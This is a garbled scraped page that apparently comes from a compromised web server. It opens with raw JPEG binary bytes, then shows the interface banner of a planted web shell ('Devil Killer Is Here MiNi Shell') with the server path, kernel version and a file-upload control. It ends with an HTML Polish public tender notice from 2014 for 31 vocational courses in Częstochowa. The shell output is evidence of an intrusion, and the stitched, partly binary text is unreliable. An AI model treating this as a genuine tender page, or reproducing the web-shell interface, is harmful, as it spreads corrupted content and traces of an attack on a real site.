JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140929/321200-N-2014.html

<p class="kh_header"><b>Częstochowa: Przeprowadzenie kursów zawodowych w tym kursów certyfikowanych - 31 części - projekt Mam zawód - mam pracę w regionie</b><br>
<b>Numer ogłoszenia: 321200 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów zawodowych w tym kursów certyfikowanych - 31 części - projekt Mam zawód - mam pracę w regionie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych w tym kursów
certyfikowanych dla uczestników projektu pn.: Mam zawód - mam pracę w regionie - 31 części.
1. Zakres zamówienia:
Część nr 1 - zorganizowanie i przeprowadzenie kursu spawania blach i rur spoinami pachwinowymi metodą
MAG (135).
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 145 h;
Przewidywana liczba uczestników zajęć wynosi 40 osób.
Część nr 2 - zorganizowanie i przeprowadzenie kursu spawania stali i jego stopów elektrodą nietopliwą w
osłonie gazów obojętnych - TIG (141).
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 123 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 3 - zorganizowanie i przeprowadzenie kursu spawania blach i rur elektrodami otulonymi - spoiny
pachwinowe (111).
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 163 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 4 - zorganizowanie i przeprowadzenie kursu spawania acetylenowo-tlenowego (gazowe).
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 127 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 5 - zorganizowanie i przeprowadzenie kursu kosztorysowania.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 30 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 6 - zorganizowanie i przeprowadzenie kursu programowania i obsługi obrabiarek sterowanych
numerycznie.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 120 h;
Przewidywana liczba uczestników zajęć wynosi 10 osób.
Część nr 7 - zorganizowanie i przeprowadzenie kursu pn. Technolog robót wykończeniowych w budownictwie.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 15 osób.
Część nr 8 - zorganizowanie i przeprowadzenie kursu pn.: Monter instalacji alarmowych i monitoringu.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 72 h;
Przewidywana liczba uczestników zajęć wynosi 50 osób.
Część nr 9 - zorganizowanie i przeprowadzenie kursu SEP do 1 kv.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 10 - zorganizowanie i przeprowadzenie kursu operatora koparko-ładowarki.
Przedmiot niniejszego zamówienia musi być wykonany zgodnie z aktualnie obowiązującymi
przepisami prawa tj. Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie
bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót
ziemnych, budowlanych i drogowych.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 202 h;
Przewidywana liczba uczestników zajęć wynosi 40 osób.
Część nr 11 - zorganizowanie i przeprowadzenie kursu prawa jazdy kat. B.
Program kursu musi być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października
2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów
i egzaminatorów- Dz. U. z 2005 r. Nr 217 poz. 1834 z późn. zmianami (Dz. U. 2006 nr 3 poz. 24, Dz. U. 2008 nr
215 poz. 1632, Dz. U. 2009 nr 78 poz. 653).
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 150 osób.
Część nr 12 - zorganizowanie i przeprowadzenie kursu kierowcy wózków widłowych (jezdniowych,
podnośnikowych wszystkich typów z napędem spalinowym, akumulatorowym lub na gaz propan - butan LPG)
wraz z wymianą butli gazowych w tychże wózkach.
Przedmiot niniejszego zamówienia musi być wykonany zgodnie z aktualnie obowiązującymi przepisami
prawa tj. rozporządzeniem MEN z dnia 11 stycznia 2012r w sprawie kształcenia ustawicznego w formach
pozaszkolnych (Dz U z 2012 poz. 186) oraz zgodnie z programem nauczania zatwierdzonym lub opracowanym
przez Urząd Dozoru Technicznego - zaświadczenie o posiadaniu programu.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 67 h;
Przewidywana liczba uczestników zajęć wynosi 35 osób.
Część nr 13 - zorganizowanie i przeprowadzenie kursu pn.: Obsługa kas fiskalnych.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 40 h;
Przewidywana liczba uczestników zajęć wynosi 40 osób.
Część nr 14 - zorganizowanie i przeprowadzenie kursu pn.: Mała księgowość
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 48 h;
Przewidywana liczba uczestników zajęć wynosi 25 osób.
Część nr 15 - zorganizowanie i przeprowadzenie kursu pn.: Podstawy księgowania wspomagane komputerem.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 145 h;
Przewidywana liczba uczestników zajęć wynosi 25 osób.
Część nr 16 - zorganizowanie i przeprowadzenie kursu pn.: Menadżer gastronomii.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 50 h;
Przewidywana liczba uczestników zajęć 20 osób.
Część nr 17 - zorganizowanie i przeprowadzenie kursu carvingu.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 15 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 18 - zorganizowanie i przeprowadzenie kursu baristy.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 15 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 19 - zorganizowanie i przeprowadzenie kursu barmańskiego.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 20 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 20 - zorganizowanie i przeprowadzenie kursu pn.: Zdobnictwo cukiernicze.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 24 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 21 - zorganizowanie i przeprowadzenie kursu pn.: Produkcja ciastek bankietowych.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 16 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 22 - zorganizowanie i przeprowadzenie kursu pn.: Elementy zdobnicze produkowane z martwego
ciasta wykorzystywane w piekarnictwie.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 8 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 23 - zorganizowanie i przeprowadzenie kursu bukieciarstwa i florystyki pn.: Artystyczne układanie
roślin.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 24 - zorganizowanie i przeprowadzenie fryzjerskiego kursu zawodowego pn.: Kobieta w harmonii.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 54 h;
Przewidywana liczba uczestników zajęć wynosi 15 osób.
Część nr 25 - zorganizowanie i przeprowadzenie kursu pn.: Pilot wycieczek
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 150 h;
Przewidywana liczba uczestników zajęć wynosi 10 osób.
Część nr 26 - zorganizowanie i przeprowadzenie kursu pn.: Wychowawca kolonijny.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 36 h;
Przewidywana liczba uczestników zajęć wynosi 25 osób.
Część nr 27 - zorganizowanie i przeprowadzenie kursu pn.: Język angielski biznesowy.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 30 osób.
Część nr 28 - zorganizowanie i przeprowadzenie kursu pn.: Język angielski zawodowy.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 32 h;
Przewidywana liczba uczestników zajęć wynosi 20 osób.
Część nr 29 - zorganizowanie i przeprowadzenie kursu FCE English.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 100 h;
Przewidywana liczba uczestników zajęć wynosi 40 osób.
Część nr 30 - zorganizowanie i przeprowadzenie kursu pn.: Organizator wycieczek.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 10 h;
Przewidywana liczba uczestników zajęć wynosi 10 osób.
Część nr 31 - zorganizowanie i przeprowadzenie kursu pn.: Montaż instalacji i urządzeń sanitarnych.
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi 60 h;
Przewidywana liczba uczestników zajęć wynosi 10 osób.
2. Szczegółowy opis przedmiotu zamówienia w zakresie wszystkich części oraz wykaz szkół, których uczniowie
zostaną objęci wsparciem w postaci kursów i kursów certyfikowanych, zawiera załącznik nr 1 do specyfikacji.
Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia w
odniesieniu do wszystkich części zawiera załącznik nr 2 do specyfikacji.
Załącznik nr 1 i nr 2 stanowić będą załącznik do umowy, której wzór jest załącznikiem nr 6 do specyfikacji.
3. Przedmiot zamówienia musi być wykonany zgodnie z aktualnie obowiązującymi przepisami prawa
tj. rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach
pozaszkolnych (Dz U z 2012 poz. 186)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1. W zakresie każdej części:
Wykonawca musi posiadać wpis do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy oraz
aktualizację na 2014 r.
2. W zakresie części 1, 2, 3, 4:
Wykonawca musi posiadać atest Certyfikowanej jednostki szkoleniowej i egzaminacyjnej spawaczy wydającej
uprawnienia międzynarodowe.
3. W zakresie części 10:
Wykonawca musi posiadać Certyfikat Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego.
4. W zakresie części 11:
Wykonawca musi posiadać wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców.
5. W zakresie części 25:
Wykonawca musi posiadać wpis do rejestru organizatorów szkoleń dla kandydatów na przewodników
turystycznych i pilotów wycieczek, prowadzonego przez marszałka województwa właściwego ze względu na
miejsce zamieszkania osoby fizycznej lub siedzibę jednostki organizacyjnej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, spełniającymi poniższe kryteria:
1. W zakresie każdej części:
Dysponują osobami, które zrealizowały należycie co najmniej trzy kursy/szkolenia grupowe dla minimum 5 osób każde z zakresu danej części zamówienia.
2. W zakresie części 1, 2, 3, 4.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają wykształcenie min.
średnie techniczne w zakresie odpowiadającym przedmiotowi zamówienia.
3. W zakresie części 5, 6, 7, 8, 9, 31.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, spełniającymi poniższe kryteria:
a) posiadają wykształcenie wyższe budowlane (tylko w odniesieniu do części 5, 7 i 31)
b) posiadają wykształcenie wyższe techniczne ( tylko odniesieniu do części 6)
c) posiadają wykształcenie wyższe techniczne na kierunku elektrycznym lub elektromechanicznym lub
elektrotechnicznym ( tylko w odniesieniu do części 8)
d) posiadają wykształcenie wyższe z zakresu elektrotechniki lub studia podyplomowe z zakresu elektrotechniki,
oraz posiadają uprawnienia SEP ( tylko w odniesieniu do części 9)
4. W zakresie części 10, 11, 12.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, spełniającymi poniższe kryteria:
a) instruktorzy prowadzący zajęcia praktyczne muszą mieć ukończony kurs kierowców wózków jezdniowych
( tylko w odniesieniu do części 12)
b) instruktor nauki jazdy kat. B, który musi posiadać minimum 2 letnie doświadczenie zawodowe, oraz posiadać
uprawnienia do szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami kat. B (tylko w
odniesieniu do części 11)
c) instruktor do praktycznej nauki na operatora koparko-ładowarki na wszystkie kl. III , musi posiadać
uprawnienia zatwierdzone przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego. (tylko w odniesieniu
do części 10 )
5. W zakresie części 13, 14, 15.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
wyższe z zakresu ekonomii.
6. W zakresie części 16, 23.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
minimum średnie.
7. W zakresie części 17.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
minimum średnie oraz zajęcie I, II lub trzeciego miejsca w konkursach carvingowych ogólnopolskich lub
wojewódzkich.
8. W zakresie części 18.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
minimum średnie oraz zajęcie I, II lub trzeciego miejsca w konkursach baristycznych ogólnopolskich lub
wojewódzkich lub posiadają certyfikat baristy I lub II stopnia.
9. W zakresie części 19.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
minimum średnie oraz zajęli I,II lub trzecie miejsce w konkursach barmańskich ogólnopolskich lub wojewódzkich
lub posiadają tytuł barmana I lub II stopnia.
10. W zakresie części 20, 21, 22.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
minimum średnie i tytuł mistrzowski z zakresu gastronomii.
11. W zakresie części 24
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi tytuł mistrza
fryzjerstwa.
12. W zakresie części 25, 26, 30.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi:
a) minimum 2-letnie doświadczenie w szkoleniu pilotów wycieczek (tylko w odniesieniu do części 25).
b) wykształcenie wyższe pedagogiczne lub psychologiczne umożliwiające świadczenie usług przygotowania,
zorganizowania i przeprowadzenia kursu na wychowawcę kolonijnego, byli wychowawcami na koloniach/
półkoloniach, lub kierownikami na koloniach/półkoloniach, (tylko w odniesieniu do części 26).
c) wykształcenie minimum średnie medyczne w zakresie ratownictwa medycznego lub są ratownikami
medycznymi (tylko w odniesieniu do części 26).
d) minimum 2-letnie doświadczenie w szkoleniu organizatorów wycieczek (tylko w odniesieniu do części 30).
13. W zakresie części 27, 28, 29.
Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie
wyższe z zakresu filologii angielskiej lub posiadają certyfikat zaawansowanego języka angielskiego typu CPE/TOEF.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumentami potwierdzającymi spełnianie warunków, o których mowa w punkcie 5.3. specyfikacji muszą być dokumenty potwierdzające uprawnienia do przeprowadzenia danego szkolenia/kursu, określone w punkcie 5.3. specyfikacji w odniesieniu do danej części zamówienia. Zamawiający sprawdzi na stronie internetowej www.ris.praca.gov.pl wpisy wykonawców do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy.

2. Wymagania dotyczące dokumentów, określonych w punktach 6.1., 6.2. i 6.3. niniejszej specyfikacji.
2.1. Dokumenty o których mowa w punkcie 6.1.c) i 6.2.a) specyfikacji winny być złożone w oryginale. Dokumenty, o których mowa w punktach 6.1.b) i 6.3. specyfikacji winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

2.2.  W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty wymienione w punkcie 6.1. specyfikacji (lub w punkcie 6.4.2.  specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wraz z dokumentem wymienionym w punkcie 6.1.a) i 6.1.c) specyfikacji).
	Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 

2.3. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ww. zobowiązanie musi być załączone do oferty przetargowej w oryginale.
Zamawiający wymaga podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy.

2.4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy Wykonawca wykazując spełnianie warunku, o którym mowa w punkcie 5.2. specyfikacji polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).

